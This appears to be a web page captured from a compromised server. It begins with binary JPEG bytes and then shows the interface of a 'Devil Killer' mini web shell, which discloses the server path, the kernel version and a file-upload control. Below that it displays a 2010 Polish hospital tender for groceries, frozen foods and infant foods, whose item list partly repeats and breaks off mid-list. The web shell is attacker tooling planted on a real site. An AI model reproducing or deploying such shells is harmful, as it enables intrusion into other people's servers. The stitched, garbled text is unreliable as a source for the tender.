JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100816/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100816/252028-N-2010.html

<p class="kh_header"><b>Radom: Zakup i dostawę  artykułów spożywczych,  mrożonek oraz produktów spożywczych dla niemowlaków dla potrzeb Radomskiego Szpitala Specjalistycznego.</b><br>
<b>Numer ogłoszenia: 252028 - 2010; data zamieszczenia: 16.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawę  artykułów spożywczych,  mrożonek oraz produktów spożywczych dla niemowlaków dla potrzeb Radomskiego Szpitala Specjalistycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa artykułów spożywczych, mrożonek oraz produktów spożywczych dla niemowlaków dla potrzeb Radomskiego Szpitala Specjalistycznego:
Zakres nr 1- Artykuły spożywcze
Lp.	Nazwa artykułu	Orientacyjna ilość  w okresie 2 lat/j.m.
1.	2.	3.
1.	Dżem porcjowany-wielkość opakowania jednostkowego-25g rodzaj opakowania plastikowe	960 kg
2.	Syrop owocowy różne smaki-bez zawartości konserwantów, bez sztucznych barwników  pasteryzowany -wielkość opakowania  jednostkowego-max-500 mL rodzaj opakowania- butelka szklana 	5400 L
3.	Sok marchwiowo - owocowy (jabłko, banan, morela) bez zawartości cukru  wielkość opakowania jednostkowego- 175mL rodzaj opakowania-butelka szklana	8000 szt
4.	Miód pszczeli nektarowy wielokwiatowy porcjowany wielkość opakowania jednostkowego -25g  rodzaj opakowania plastikowe	960 kg
5.	Ananas konserwowy w plastrach wielkość opakowania jednostkowego-  max-600g	120kg
6.	Sok owocowy- -wielkość opakowania jednostkowego-0.2L rodzaj opakowania-  kartonik	1440szt
7.	Kawa zbożowa rozpuszczalna-wielkość opakowania jednostkowego-max 180g	300kg
8.	Kakao naturalne wielkość opakowania jednostkowego max-120g	12kg
9.	Herbata granulowana luzem wielkość opakowania jednostkowego max -100g	600kg
10.	Śmietanka do kawy-wielkość opakowania jednostkowego-10g rodzaj opakowania-plastikowe	400op po10szt
11.	Krakersy wielkość opakowania jednostkowego max- 200g                           	528kg
12.	Herbatniki  wielkość opakowania jednostkowego max-100g   	384kg
13.	Chrupki kukurydziane wielkość opakowania jednostkowego max-100g       	384kg
14.	Paluszki z sezamem, solone, z makiem wielkość opakowania jednostkowego max 100g            	528kg
15.	Biszkopty okrągłe wielkość opakowania jednostkowego max-200g	288kg
16.	Wafle śmietankowe wielkość opakowania jednostkowego max-100g	120kg
18.	Groch łuskany połówki- wielkość opakowania jednostkowego max -5kg	240kg
19.	Fasola sucha Jaś średni-wielkość opakowania jednostkowego max-5kg	600kg
20.	Groszek konserwowy wielkość opakowania jednostkowego max-450g	840kg
21.	Kukurydza konserwowa wielkość opakowania jednostkowego max- 400g	840kg
22.	Ogórki konserwowe wielkość opakowania jednostkowego max-1kg	480kg
23.	Papryka konserwowa wielkość opakowania jednostkowego max-1kg	720kg
24.	Seler wiórki konserwowy wielkość opakowania jednostkowego max-350g	80kg
25.	Fasolka czerwona konserwowa wielkość opakowania jednostkowego max-450g	360kg
26.	Sos słodko- kwaśny wielkość opakowania jednostkowego max 600g	100kg
27.	Cebulka konserwowa srebrna wielkość opakowania jednostkowego max-220g	160kg
28.	Kasza jęczmienna średnia wielkość opakowania jednostkowego max 500g	1680kg
29.	Kasza manna błyskawiczna-wielkość opakowania max-1kg	3600kg
30.	Kasza gryczana  niepalona wielkość opakowania jednostkowego max-5kg	480kg
31.	Ryż -biały długoziarnisty wielkość opakowania jednostkowego max -1kg	6000kg
32.	Płatki jęczmienne błyskawiczne wielkość opakowania jednostkowego max-1kg 	3200kg
33.	Makarony z mąki wyprodukowanej z pszenicy durum, o zawartości białka 12g i powyżej na 100g produktu (nitki, świderki, muszle , wstążki) w opakowaniach jednostkowych max-1kg	6000kg
34.	Mąka pszenna typ 500 wielkość opakowania jednostkowego max-1kg	6000kg
35.	Mąka ziemniaczana- wielkość opakowania jednostkowego max-1kg	360kg
36.	Mąka kukurydziana-wielkość opakowania jednostkowego max-500g	72kg
37.	Kleik ryżowy- wielkość opakowania jednostkowego max-200g	264kg
38.	Mleko w proszku- wielkość opakowania jednostkowego max-1kg	30kg
39.	Drożdże spożywcze wielkość opakowania jednostkowego- 100g	48kg
40.	Kisiel owocowy bez zawartości cukru różne smaki wielkość opakowania jednostkowego max-70g	360kg
41.	Budyń waniliowy lub śmietankowy bez zawartości cukru wielkość opakowania jednostkowego max-70g	288kg
42.	Galaretka owocowa różne smaki wielkość opakowania jednostkowego max-85g	168kg
43.	Kwasek cytrynowy wielkość opakowania jednostkowego max-50g	42kg
44.	Pieprz czarny mielony wielkość opakowania jednostkowego max-25g	80kg
45.	Przyprawa warzywna w proszku lub granulkach wielkość opakowania jednostkowego max-100g	420kg
46.	Kostki rosołowe (drobiowe, wołowe)wielkość opakowania jednostkowego max-80g	408kg
47.	Cukier wanilinowy wielkość opakowania jednostkowego max-40g	36kg
48.	Czosnek suszony granulowany wielkość opakowania jednostkowego max-25g	48kg
49.	Liść laurowy wielkość opakowania jednostkowego max-20g	20kg
50.	Ziele angielskie wielkość opakowania jednostkowego max-20g	40kg
51.	Papryka mielona ostra wielkość opakowania jednostkowego max-20g	20kg
52.	Majeranek wielkość opakowania jednostkowego max-20g	30kg
53.	Imbir mielony wielkość opakowania jednostkowego max-20g	2kg
54.	Gałka muszkatołowa mielona wielkość opakowania jednostkowego max-20g	2kg
55.	Bazylia mielona wielkość opakowania jednostkowego max-20g	2kg
56.	Oregano mielone wielkość opakowania jednostkowego max-20g	2kg
57.	Przyprawa do kurczaka mielona wielkość opakowania jednostkowego max-60g	17kg
58.	Przyprawa gros wielkość opakowania jednostkowego max-40g	2kg
59.	Barszcz biały - bez konserwantów  bez dodatku ekstraktu drożdży wielkość opakowania jednostkowego max-80g	24kg
60.	Barszcz czerwony-o zawartości suszonego koncentratu buraka czerwonego powyżej 14% wielkość opakowania jednostkowego max-60g	24kg
61.	Żelatyna spożywcza wielkość opakowania jednostkowego max-60g	12kg
62.	Sól kuchenna -warzona, jodowana wielkość opakowania jednostkowego max-1kg	3600kg
63.	Koncentrat pomidorowy  30 % wielkość opakowania jednostkowego max-200g	1080kg
64.	Majonez -o zawartości tłuszczu od 60g i powyżej w 100g produktu wielkość opakowania jednostkowego max-250g	480kg
65.	Ocet 10% wielkość opakowania jednostkowego max-0.5L	100l
66.	Ketchup -o zawartości pomidorów powyżej 120g w 100g ketchupu wielkość opakowania jednostkowego max-500g 	72kg
67.	Musztarda stołowa  wielkość opakowania jednostkowego max-500g 	240kg
68.	Musztarda stołowa  wielkość opakowania max-210g	200kg
69.	Chrzan tarty wielkość opakowania jednostkowego max-250g	360kg
70.	Proszek do pieczenia wielkość opakowania jednostkowego max-40g	6kg
71.	 Cukier kryształ- wielkość opakowania max-1kg	12000kg
72.	Glukoza- wielkość opakowania jednostkowego  max-200g	14kg
73.	Cukier puder wielkość opakowania jednostkowego max-500g	24kg
74.	 Olej rzepakowy wielkość  opakowania jednostkowego max-1L	1200l
75.	Olej słonecznikowy wielkość opakowania jednostkowego max-1L	1200l
76.	Aromat do ciast wielkość opakowania jednostkowego max-10g 	150szt
Warunki dostawy artykułów spożywczych:
a) ) dostawa towaru nie częściej niż 1 raz w tygodniu
b) Nie zamówienie poszczególnego asortymentu w danym miesiącu nie jest w żadnym przypadku odstąpieniem od umowy .
c) dostawa w ciągu 48 godz. od dnia złożenia zamówienia- dni robocze (magazyn czynny w godz. 8:00- 15:00)

Zakres nr 2- Mrożonki warzywne, rybne i mięsne
Lp.	Nazwa artykułu	Orientacyjna ilość
w okresie 2 lat/j.m.
1.	2.	3.
1.	Marchew mrożona  wielkość opakowania jednostkowego max-0.50kg	300kg
2.	Mieszanka warzywna wieloskładnikowa składnikowa wielkość opakowania jednostkowego max-0.50kg	480kg
3.	Ryba mrożona Mintaj  warstwy filetów przełożone folią wielkość opakowania tafla od 5-7kg 	480kg
4.	Ryba mrożona Dorsz, warstwy filetów przełożone folią wielkość opakowania tafla od 5-7kg	480kg
5.	Kalafior mrożony  wielkość opakowania jednostkowego max-0.50kg	240kg
6.	Fasolka mrożona -wielkość opakowania jednostkowego max-0.50kg	300kg
7.	Porzeczka czarna mrożona -wielkość opakowania jednostkowego max-2.50kg	1440kg
8.	Truskawki mrożone wielkość opakowania jednostkowego max-2.50kg	480kg
9.	Pyzy mrożone bez mięsa -wielkość opakowania jednostkowego max-0.50kg	840kg
10.	Frytki mrożone wielkość opakowania jednostkowego max-2.50kg	1200kg
11.	Flaki wołowe parzone krojone wielkość opakowania max-1kg	480kg
12.	 Hamburger waga  od50g-60g jednej sztuki	90kg
13.	Śledź płaty marynowane w zalewie grejpfrutowej wielkość opakowania jednostkowego max-4kg	192kg
Warunki dostawy:
a) towar określony w pozycjach :
-	1  zamawiany będzie w miesiącach: maj, czerwiec lipiec
-	2 zamawiany będzie w miesiącach: kwiecień, maj, czerwiec lipiec
-	3 i 13 zamawiany będzie od września do maja
-	Pozostałe towary będą zamawiane sukcesywnie przez okres obowiązywanie umowy, (nie zamówienie poszczególnego asortymentu wdanym miesiącu nie jest w żadnym przypadku odstąpieniem od umowy )
b) dostawa towaru na zamówienie- nie częściej niż 1 raz w tygodniu
c) dostawa w ciągu 48 godz. od dnia złożenia zamówienia- dni robocze (magazyn czynny w godz. 8:00-15:00)
d) do każdej dostawy zostanie załączony aktualny handlowy dokument  identyfikacyjny zgodnie 
z ustawą z dnia 16 grudnia 2005r o produktach pochodzenia zwierzęcego (Dz.U.2006, nr 17. poz. 127) oraz Rozporządzeniem WE 853/2004 Parlamentu Europejskiego i Rady z dnia 29.04.2004 ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz.U. UE L139 z dnia 30.04.2004)

Zakres nr 3- Produkty spożywcze dla niemowlaków
Lp.	Nazwa artykułu	Orientacyjna ilość
w okresie 2 lat/j.m.
1.	2.	3.
1.	Jabłuszko (przecier) po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	2400 szt.
2.	Jabłko z marchewką po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	1200 szt.
3.	Marchewka po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	720 szt.
4.	Zupka jarzynowa z warzywami i ryżem po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	960 szt.
5.	Jabłko z bananem lub brzoskwinią  lub jagodą po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	2400 szt.
6.	Kaszka do picia mleczno-ryżowo- kukurydziana jagodą po 4 miesiącu życia dziecka, w kartoniku wielkość opakowania jednostkowego max. 250ml	4800 szt.
7.	Marchewka z ryżem jagodą po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	1200 szt.
8.	Zupa jarzynowa z kurczakiem lub indykiem lub królikiem , po 5 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	2400 szt.
9.	Ryż z mięsem i z warzywami po 12 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 250g	480 szt.
10.	Mleko w proszku z kleikiem ryżowym po 6 miesiącu życia dziecka, w kartoniku , wielkość opakowania jednostkowego max. 350g	60 szt. 
11.	Herbatka granulat  od 1 miesiąca życia- koper włoski, w puszce wielkość opakowania jednostkowego max. 200g	48 szt.
12.	 Herbatka granulat  od 1 miesiąca życia- rumianek, w puszce wielkość opakowania jednostkowego max. 200g	48 szt.
13.	Kleik ryżowy po 4 miesiącu życia dziecka, opakowanie typu paczka szklane , wielkość opakowania jednostkowego max. 180g	24 szt.
14.	Woda mineralna niegazowana 	720 szt. 
15.	Herbata ekspresowa ( czarna), w pudełku po 100 torebek	24 szt. 
Woda mineralna niegazowana z poz. nr 14 musi posiadać certyfikat Instytutu Matki i.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.89.10.00-8, 15.89.80.00-9, 15.60.00.00-4, 13.33.00.00-0, 15.41.11.00-3, 15.87.12.50-1, 15.87.12.73-8, 15.83.12.00-4, 15.86.00.00-4, 15.80.00.00-6, 15.22.10.00-3, 15.33.11.70-9, 15.89.60.00-5, 15.88.40.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje środkiem transportu drogowego do przewozu środków spożywczych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo jeżeli ofertę składa pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa- mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto.
b) Ceny jednostkowe mogą również ulec zmianie po upływie roku obowiązywania umowy o wskaźnik inflacji ogłoszony przez prezesa GUS za ostatni kwartał przed upływem roku obowiązywania umowy ( po złożeniu wcześniejszego wniosku przez strony umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Pulicznych Funduszy Strukturalnych i Zaopatrzenia, 
ul. Lekarska 4, 26-610 Radom.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2010 godzina 10:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Pulicznych Funduszy Strukturalnych i Zaopatrzenia, 
ul. Lekarska 4, 26-610 Radom, III piętro pok. 313.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 1- Artykuły spożywcze
Lp.	Nazwa artykułu	Orientacyjna ilość  w okresie 2 lat/j.m.
1.	2.	3.
1.	Dżem porcjowany-wielkość opakowania jednostkowego-25g rodzaj opakowania plastikowe	960 kg
2.	Syrop owocowy różne smaki-bez zawartości konserwantów, bez sztucznych barwników  pasteryzowany -wielkość opakowania  jednostkowego-max-500 mL rodzaj opakowania- butelka szklana 	5400 L
3.	Sok marchwiowo - owocowy (jabłko, banan, morela) bez zawartości cukru  wielkość opakowania jednostkowego- 175mL rodzaj opakowania-butelka szklana	8000 szt
4.	Miód pszczeli nektarowy wielokwiatowy porcjowany wielkość opakowania jednostkowego -25g  rodzaj opakowania plastikowe	960 kg
5.	Ananas konserwowy w plastrach wielkość opakowania jednostkowego-  max-600g	120kg
6.	Sok owocowy- -wielkość opakowania jednostkowego-0.2L rodzaj opakowania-  kartonik	1440szt
7.	Kawa zbożowa rozpuszczalna-wielkość opakowania jednostkowego-max 180g	300kg
8.	Kakao naturalne wielkość opakowania jednostkowego max-120g	12kg
9.	Herbata granulowana luzem wielkość opakowania jednostkowego max -100g	600kg
10.	Śmietanka do kawy-wielkość opakowania jednostkowego-10g rodzaj opakowania-plastikowe	400op po10szt
11.	Krakersy wielkość opakowania jednostkowego max- 200g                           	528kg
12.	Herbatniki  wielkość opakowania jednostkowego max-100g   	384kg
13.	Chrupki kukurydziane wielkość opakowania jednostkowego max-100g       	384kg
14.	Paluszki z sezamem, solone, z makiem wielkość opakowania jednostkowego max 100g            	528kg
15.	Biszkopty okrągłe wielkość opakowania jednostkowego max-200g	288kg
16.	Wafle śmietankowe wielkość opakowania jednostkowego max-100g	120kg
18.	Groch łuskany połówki- wielkość opakowania jednostkowego max -5kg	240kg
19.	Fasola sucha Jaś średni-wielkość opakowania jednostkowego max-5kg	600kg
20.	Groszek konserwowy wielkość opakowania jednostkowego max-450g	840kg
21.	Kukurydza konserwowa wielkość opakowania jednostkowego max- 400g	840kg
22.	Ogórki konserwowe wielkość opakowania jednostkowego max-1kg	480kg
23.	Papryka konserwowa wielkość opakowania jednostkowego max-1kg	720kg
24.	Seler wiórki konserwowy wielkość opakowania jednostkowego max-350g	80kg
25.	Fasolka czerwona konserwowa wielkość opakowania jednostkowego max-450g	360kg
26.	Sos słodko- kwaśny wielkość opakowania jednostkowego max 600g	100kg
27.	Cebulka konserwowa srebrna wielkość opakowania jednostkowego max-220g	160kg
